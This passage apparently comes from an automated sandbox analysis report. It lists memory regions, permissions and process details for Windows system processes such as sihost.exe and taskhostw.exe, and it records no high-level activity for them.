| vedatamodel.edb | 0xf3bb660000 | 0xf3bb66ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb670000 | 0xf3bb67ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb680000 | 0xf3bb68ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb690000 | 0xf3bb69ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6a0000 | 0xf3bb6affff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6b0000 | 0xf3bb6bffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6c0000 | 0xf3bb6cffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6d0000 | 0xf3bb6dffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6e0000 | 0xf3bb6effff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb6f0000 | 0xf3bb6fffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb700000 | 0xf3bb70ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb710000 | 0xf3bb71ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb720000 | 0xf3bb72ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb730000 | 0xf3bb73ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb740000 | 0xf3bb74ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb750000 | 0xf3bb75ffff | Memory Mapped File | r |
|
|
|
- |
| vedatamodel.edb | 0xf3bb760000 | 0xf3bb76ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000f3bb770000 | 0xf3bb770000 | 0xf3bb770fff | Private Memory | rw |
|
|
|
- |
| vedatamodel.edb | 0xf3bb780000 | 0xf3bb78ffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00007df5ff2e0000 | 0x7df5ff2e0000 | 0x7ff5ff2dffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff7874b2000 | 0x7ff7874b2000 | 0x7ff7874b3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7874ba000 | 0x7ff7874ba000 | 0x7ff7874bbfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7874be000 | 0x7ff7874be000 | 0x7ff7874bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff7874c0000 | 0x7ff7874c0000 | 0x7ff7875bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff7875c0000 | 0x7ff7875c0000 | 0x7ff7875e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff7875ec000 | 0x7ff7875ec000 | 0x7ff7875edfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff7875ee000 | 0x7ff7875ee000 | 0x7ff7875eefff | Private Memory | rw |
|
|
|
- |
| svchost.exe | 0x7ff787ec0000 | 0x7ff787eccfff | Memory Mapped File | rwx |
|
|
|
- |
| staterepository.core.dll | 0x7ffae5d00000 | 0x7ffae5d98fff | Memory Mapped File | rwx |
|
|
|
- |
|
For performance reasons, the remaining 37 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Process #53: sihost.exe
0
0
| Information | Value |
|---|---|
| ID | #53 |
| File Name | c:\windows\system32\sihost.exe |
| Command Line | sihost.exe |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7c8 |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
808
0x
7B0
0x
5C4
0x
4E0
0x
49C
0x
47C
0x
448
0x
124
0x
40
0x
7FC
0x
7CC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000096cef70000 | 0x96cef70000 | 0x96cef7ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000096cef80000 | 0x96cef80000 | 0x96cef86fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000096cef90000 | 0x96cef90000 | 0x96cefa3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000096cefb0000 | 0x96cefb0000 | 0x96cf02ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000096cf030000 | 0x96cf030000 | 0x96cf033fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000096cf040000 | 0x96cf040000 | 0x96cf041fff | Private Memory | rw |
|
|
|
- |
| private_0x00000096cf050000 | 0x96cf050000 | 0x96cf056fff | Private Memory | rw |
|
|
|
- |
| private_0x00000096cf060000 | 0x96cf060000 | 0x96cf060fff | Private Memory | rw |
|
|
|
- |
| private_0x00000096cf070000 | 0x96cf070000 | 0x96cf070fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000096cf080000 | 0x96cf080000 | 0x96cf080fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000096cf090000 | 0x96cf090000 | 0x96cf18ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x96cf190000 | 0x96cf24dfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000096cf2d0000 | 0x96cf2d0000 | 0x96cf2d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000096cf2e0000 | 0x96cf2e0000 | 0x96cf35ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096cf360000 | 0x96cf360000 | 0x96cf36ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096cf390000 | 0x96cf390000 | 0x96cf39ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000096cf3a0000 | 0x96cf3a0000 | 0x96cf527fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000096cf530000 | 0x96cf530000 | 0x96cf6b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000096cf6c0000 | 0x96cf6c0000 | 0x96d0abffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000096d0ac0000 | 0x96d0ac0000 | 0x96d0bbffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x96d0bc0000 | 0x96d0ef6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000096d0f00000 | 0x96d0f00000 | 0x96d0f7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d0f80000 | 0x96d0f80000 | 0x96d0ffffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1000000 | 0x96d1000000 | 0x96d107ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1080000 | 0x96d1080000 | 0x96d10fffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1100000 | 0x96d1100000 | 0x96d117ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1180000 | 0x96d1180000 | 0x96d127ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1280000 | 0x96d1280000 | 0x96d1a7ffff | Private Memory | - |
|
|
|
- |
| private_0x00000096d1b00000 | 0x96d1b00000 | 0x96d1b7ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1b80000 | 0x96d1b80000 | 0x96d1bfffff | Private Memory | rw |
|
|
|
- |
| private_0x00000096d1c00000 | 0x96d1c00000 | 0x96d1c7ffff | Private Memory | rw |
|
|
|
- |
| kernelbase.dll.mui | 0x96d1c80000 | 0x96d1d5efff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000096d1d60000 | 0x96d1d60000 | 0x96d1ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000096d1e60000 | 0x96d1e60000 | 0x96d1e89fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000096d1f90000 | 0x96d1f90000 | 0x96d208ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007df5ff900000 | 0x7df5ff900000 | 0x7ff5ff8fffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x00007ff6dbbf2000 | 0x7ff6dbbf2000 | 0x7ff6dbbf3fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbbf4000 | 0x7ff6dbbf4000 | 0x7ff6dbbf5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbbf6000 | 0x7ff6dbbf6000 | 0x7ff6dbbf7fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbbf8000 | 0x7ff6dbbf8000 | 0x7ff6dbbf9fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbbfc000 | 0x7ff6dbbfc000 | 0x7ff6dbbfdfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbbfe000 | 0x7ff6dbbfe000 | 0x7ff6dbbfffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00007ff6dbc00000 | 0x7ff6dbc00000 | 0x7ff6dbcfffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff6dbd00000 | 0x7ff6dbd00000 | 0x7ff6dbd22fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff6dbd23000 | 0x7ff6dbd23000 | 0x7ff6dbd24fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbd25000 | 0x7ff6dbd25000 | 0x7ff6dbd26fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbd27000 | 0x7ff6dbd27000 | 0x7ff6dbd28fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbd29000 | 0x7ff6dbd29000 | 0x7ff6dbd2afff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbd2d000 | 0x7ff6dbd2d000 | 0x7ff6dbd2efff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff6dbd2f000 | 0x7ff6dbd2f000 | 0x7ff6dbd2ffff | Private Memory | rw |
|
|
|
- |
| sihost.exe | 0x7ff6dc800000 | 0x7ff6dc815fff | Memory Mapped File | rwx |
|
|
|
- |
| staterepository.core.dll | 0x7ffae5d00000 | 0x7ffae5d98fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.staterepository.dll | 0x7ffae5da0000 | 0x7ffae6031fff | Memory Mapped File | rwx |
|
|
|
- |
| licensemanagerapi.dll | 0x7ffae8200000 | 0x7ffae820bfff | Memory Mapped File | rwx |
|
|
|
- |
| twinui.appcore.dll | 0x7ffae8210000 | 0x7ffae841cfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelproxy.dll | 0x7ffae84f0000 | 0x7ffae8504fff | Memory Mapped File | rwx |
|
|
|
- |
| sharehost.dll | 0x7ffae8580000 | 0x7ffae8624fff | Memory Mapped File | rwx |
|
|
|
- |
| ondemandbrokerclient.dll | 0x7ffae8630000 | 0x7ffae8640fff | Memory Mapped File | rwx |
|
|
|
- |
| appcontracts.dll | 0x7ffae8650000 | 0x7ffae86fbfff | Memory Mapped File | rwx |
|
|
|
- |
| notificationplatformcomponent.dll | 0x7ffae8700000 | 0x7ffae870cfff | Memory Mapped File | rwx |
|
|
|
- |
| execmodelclient.dll | 0x7ffae8710000 | 0x7ffae8752fff | Memory Mapped File | rwx |
|
|
|
- |
| wpportinglibrary.dll | 0x7ffae89e0000 | 0x7ffae89e8fff | Memory Mapped File | rwx |
|
|
|
- |
| modernexecserver.dll | 0x7ffae89f0000 | 0x7ffae8ac7fff | Memory Mapped File | rwx |
|
|
|
- |
| dsclient.dll | 0x7ffae8ad0000 | 0x7ffae8adbfff | Memory Mapped File | rwx |
|
|
|
- |
| userdatatypehelperutil.dll | 0x7ffae8ae0000 | 0x7ffae8af0fff | Memory Mapped File | rwx |
|
|
|
- |
| activationmanager.dll | 0x7ffae8b00000 | 0x7ffae8b5dfff | Memory Mapped File | rwx |
|
|
|
- |
| actxprxy.dll | 0x7ffae8b60000 | 0x7ffae8fc9fff | Memory Mapped File | rwx |
|
|
|
- |
| coreuicomponents.dll | 0x7ffae8fd0000 | 0x7ffae9230fff | Memory Mapped File | rwx |
|
|
|
- |
| appointmentactivation.dll | 0x7ffae9d90000 | 0x7ffae9db1fff | Memory Mapped File | rwx |
|
|
|
- |
| edputil.dll | 0x7ffae9dc0000 | 0x7ffae9deefff | Memory Mapped File | rwx |
|
|
|
- |
| clipboardserver.dll | 0x7ffae9df0000 | 0x7ffae9e1ffff | Memory Mapped File | rwx |
|
|
|
- |
| windows.shell.servicehostbuilder.dll | 0x7ffae9e20000 | 0x7ffae9e31fff | Memory Mapped File | rwx |
|
|
|
- |
| desktopshellext.dll | 0x7ffae9e40000 | 0x7ffae9e56fff | Memory Mapped File | rwx |
|
|
|
- |
| iertutil.dll | 0x7ffaedb10000 | 0x7ffaede85fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcp110_win.dll | 0x7ffaef7b0000 | 0x7ffaef841fff | Memory Mapped File | rwx |
|
|
|
- |
| policymanager.dll | 0x7ffaef850000 | 0x7ffaef888fff | Memory Mapped File | rwx |
|
|
|
- |
| xmllite.dll | 0x7ffaef9c0000 | 0x7ffaef9f5fff | Memory Mapped File | rwx |
|
|
|
- |
| wintypes.dll | 0x7ffaf0de0000 | 0x7ffaf0f10fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrproxy.dll | 0x7ffaf0f20000 | 0x7ffaf0f5dfff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7ffaf1040000 | 0x7ffaf11c2fff | Memory Mapped File | rwx |
|
|
|
- |
| mmdevapi.dll | 0x7ffaf11d0000 | 0x7ffaf1241fff | Memory Mapped File | rwx |
|
|
|
- |
| usermgrcli.dll | 0x7ffaf13a0000 | 0x7ffaf13affff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x7ffaf24b0000 | 0x7ffaf24d1fff | Memory Mapped File | rwx |
|
|
|
- |
| coremessaging.dll | 0x7ffaf2560000 | 0x7ffaf2627fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7ffaf2d10000 | 0x7ffaf2da5fff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7ffaf2db0000 | 0x7ffaf2dd6fff | Memory Mapped File | rwx |
|
|
|
- |
| twinapi.appcore.dll | 0x7ffaf2ef0000 | 0x7ffaf2fddfff | Memory Mapped File | rwx |
|
|
|
- |
| rmclient.dll | 0x7ffaf3070000 | 0x7ffaf3097fff | Memory Mapped File | rwx |
|
|
|
- |
| netutils.dll | 0x7ffaf36f0000 | 0x7ffaf36fbfff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7ffaf37e0000 | 0x7ffaf3811fff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7ffaf3960000 | 0x7ffaf3992fff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7ffaf3a50000 | 0x7ffaf3a6efff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7ffaf3d00000 | 0x7ffaf3d16fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x7ffaf41b0000 | 0x7ffaf41dbfff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7ffaf41e0000 | 0x7ffaf41eafff | Memory Mapped File | rwx |
|
|
|
- |
| bcrypt.dll | 0x7ffaf4260000 | 0x7ffaf4287fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x7ffaf4290000 | 0x7ffaf42fafff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x7ffaf44b0000 | 0x7ffaf44c0fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7ffaf4540000 | 0x7ffaf4583fff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x7ffaf4c80000 | 0x7ffaf4e40fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7ffaf55b0000 | 0x7ffaf56f0fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7ffaf6ec0000 | 0x7ffaf6f64fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7ffaf7190000 | 0x7ffaf724dfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Process #54: taskhostw.exe
0
0
| Information | Value |
|---|---|
| ID | #54 |
| File Name | c:\windows\system32\taskhostw.exe |
| Command Line | taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E} |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:03:42, Reason: Child Process |
| Unmonitor | End Time: 00:05:01, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:19 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x7d0 |
| Parent PID | 0x318 (c:\windows\system32\svchost.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
2F8
0x
A6C
0x
A60
0x
9C0
0x
98C
0x
988
0x
980
0x
97C
0x
40C
0x
7D4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00000051822b0000 | 0x51822b0000 | 0x51822bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000051822c0000 | 0x51822c0000 | 0x51822c6fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000051822d0000 | 0x51822d0000 | 0x51822e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000051822f0000 | 0x51822f0000 | 0x518236ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005182370000 | 0x5182370000 | 0x5182373fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005182380000 | 0x5182380000 | 0x5182380fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005182390000 | 0x5182390000 | 0x5182391fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x51823a0000 | 0x518245dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005182460000 | 0x5182460000 | 0x518255ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005182560000 | 0x5182560000 | 0x51825dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000051825e0000 | 0x51825e0000 | 0x51825e6fff | Private Memory | rw |
|
|
|
- |
| private_0x00000051825f0000 | 0x51825f0000 | 0x518266ffff | Private Memory | rw |
|
|
|
- |
| taskhostw.exe.mui | 0x5182670000 | 0x5182670fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005182680000 | 0x5182680000 | 0x5182680fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005182690000 | 0x5182690000 | 0x5182690fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000051826a0000 | 0x51826a0000 | 0x51826a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000051826b0000 | 0x51826b0000 | 0x51826b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000051826c0000 | 0x51826c0000 | 0x51826cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000051826d0000 | 0x51826d0000 | 0x5182857fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005182860000 | 0x5182860000 | 0x51829e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000051829f0000 | 0x51829f0000 | 0x5183deffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005183df0000 | 0x5183df0000 | 0x5183ea7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000005183eb0000 | 0x5183eb0000 | 0x5183eb0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005183ec0000 | 0x5183ec0000 | 0x5183ec0fff | Private Memory | rw |
|
|
|
- |
| msctfmonitor.dll.mui | 0x5183ed0000 | 0x5183ed0fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000005183ee0000 | 0x5183ee0000 | 0x5183ee0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005183ef0000 | 0x5183ef0000 | 0x5183ef6fff | Private Memory | rw |
|
|
|
- |
| winmm.dll.mui | 0x5183f00000 | 0x5183f05fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000005183f10000 | 0x5183f10000 | 0x5183f10fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005183f20000 | 0x5183f20000 | 0x5183f27fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000005183f30000 | 0x5183f30000 | 0x5183f30fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000005183f40000 | 0x5183f40000 | 0x5183f40fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005183f50000 | 0x5183f50000 | 0x5183f50fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005183f60000 | 0x5183f60000 | 0x5183f6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005183f70000 | 0x5183f70000 | 0x5183feffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005183ff0000 | 0x5183ff0000 | 0x518406ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x5184070000 | 0x51843a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000051843b0000 | 0x51843b0000 | 0x518442ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005184430000 | 0x5184430000 | 0x51844affff | Private Memory | rw |
|
|
|
- |
| private_0x0000005184530000 | 0x5184530000 | 0x518462ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005184630000 | 0x5184630000 | 0x51846affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000051846b0000 | 0x51846b0000 | 0x51846bffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000051846c0000 | 0x51846c0000 | 0x51846cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000051846d0000 | 0x51846d0000 | 0x51846dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000051846e0000 | 0x51846e0000 | 0x51846effff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x00000051846f0000 | 0x51846f0000 | 0x51846fffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184700000 | 0x5184700000 | 0x518470ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184710000 | 0x5184710000 | 0x518471ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184720000 | 0x5184720000 | 0x518472ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184730000 | 0x5184730000 | 0x518473ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184740000 | 0x5184740000 | 0x518474ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184750000 | 0x5184750000 | 0x518475ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000005184760000 | 0x5184760000 | 0x518476ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000005184770000 | 0x5184770000 | 0x518576ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005185770000 | 0x5185770000 | 0x5185773fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005185780000 | 0x5185780000 | 0x5185781fff | Private Memory | rw |
|
|
|
- |
| private_0x0000005185790000 | 0x5185790000 | 0x5185790fff | Private Memory | rw |
|
|
|
- |
| private_0x00000051857a0000 | 0x51857a0000 | 0x518582ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005185830000 | 0x5185830000 | 0x518982ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000005189830000 | 0x5189830000 | 0x518d82ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000518d830000 | 0x518d830000 | 0x518d837fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518d840000 | 0x518d84ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d850000 | 0x518d85ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d860000 | 0x518d86ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d870000 | 0x518d87ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d880000 | 0x518d88ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d890000 | 0x518d89ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8a0000 | 0x518d8affff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8b0000 | 0x518d8bffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8c0000 | 0x518d8cffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8d0000 | 0x518d8dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8e0000 | 0x518d8effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d8f0000 | 0x518d8fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d900000 | 0x518d90ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d910000 | 0x518d91ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d920000 | 0x518d92ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d930000 | 0x518d93ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000518d940000 | 0x518d940000 | 0x518d9bffff | Private Memory | rw |
|
|
|
- |
| private_0x000000518d9c0000 | 0x518d9c0000 | 0x518d9c7fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518d9d0000 | 0x518d9dffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d9e0000 | 0x518d9effff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518d9f0000 | 0x518d9fffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518da00000 | 0x518da0ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000518da10000 | 0x518da10000 | 0x518da8ffff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518da90000 | 0x518da9ffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518daa0000 | 0x518daaffff | Memory Mapped File | r |
|
|
|
- |
| private_0x000000518dab0000 | 0x518dab0000 | 0x518dab7fff | Private Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518dac0000 | 0x518dacffff | Memory Mapped File | r |
|
|
|
- |
| webcachev01.dat | 0x518dad0000 | 0x518dadffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x000000518dae0000 | 0x518dae0000 | 0x518daeffff | Pagefile Backed Memory | rw |
|
|
|
- |
| webcachev01.dat | 0x518daf0000 | 0x518dafffff | Memory Mapped File | r |
|
|
|
- |
